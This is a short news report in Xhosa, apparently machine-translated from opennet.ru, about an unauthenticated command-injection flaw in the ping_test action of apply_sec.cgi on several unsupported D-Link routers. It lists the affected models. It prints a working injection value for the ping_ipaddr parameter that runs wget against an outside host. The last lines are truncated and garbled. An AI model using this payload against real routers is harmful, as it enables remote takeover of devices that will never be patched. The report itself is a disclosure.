Kwi-D-Link iirotha ezingenazingcingo
Okubangel 'umdla kukuba, ngokutsho kwabaphuhlisi be-firmware, umnxeba othi "ping_test" kufuneka uqhutywe kuphela emva kokuqinisekiswa, kodwa ngokwenene kuthiwa kuyo nayiphi na imeko, kungakhathaliseki ukuba ungene kwi-interface yewebhu. Ngokukodwa, xa ufikelela kwi-apply_sec.cgi script kwaye udlula "isenzo=ping_test" ipharamitha, iskripthi siqondisa kwakhona kwiphepha lokuqinisekisa, kodwa kwangaxeshanye senza isenzo esihambelana ne-ping_test. Ukwenza ikhowudi, omnye ubuthathaka usetyenziswe kwi-ping_test ngokwayo, ebiza i-ping utility ngaphandle kokujonga ngokufanelekileyo ukuchaneka kwedilesi ye-IP ethunyelwe ukuvavanywa. Umzekelo, ukubiza i-wget utility kwaye udlulisele iziphumo zomyalelo "we-echo 1234" kumamkeli wangaphandle, cacisa nje ipharamitha "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".
Ubukho bobuthathaka buqinisekisiwe ngokusemthethweni kwezi modeli zilandelayo:
- I-DIR-655 ene-firmware 3.02b05 okanye ngaphezulu;
- I-DIR-866L ene-firmware 1.03b04 okanye ngaphezulu;
- I-DIR-1565 ene-firmware 1.01 okanye ngaphezulu;
- I-DIR-652 (akukho lwazi malunga neenguqulelo ze-firmware eziyingxaki zinikezelweyo)
Ixesha lokuxhasa le mizekelo sele liphelile, ngoko ke D-Link
Kamva kwafunyaniswa ukuba sesichengeni kwakhona
umthombo: opennet.ru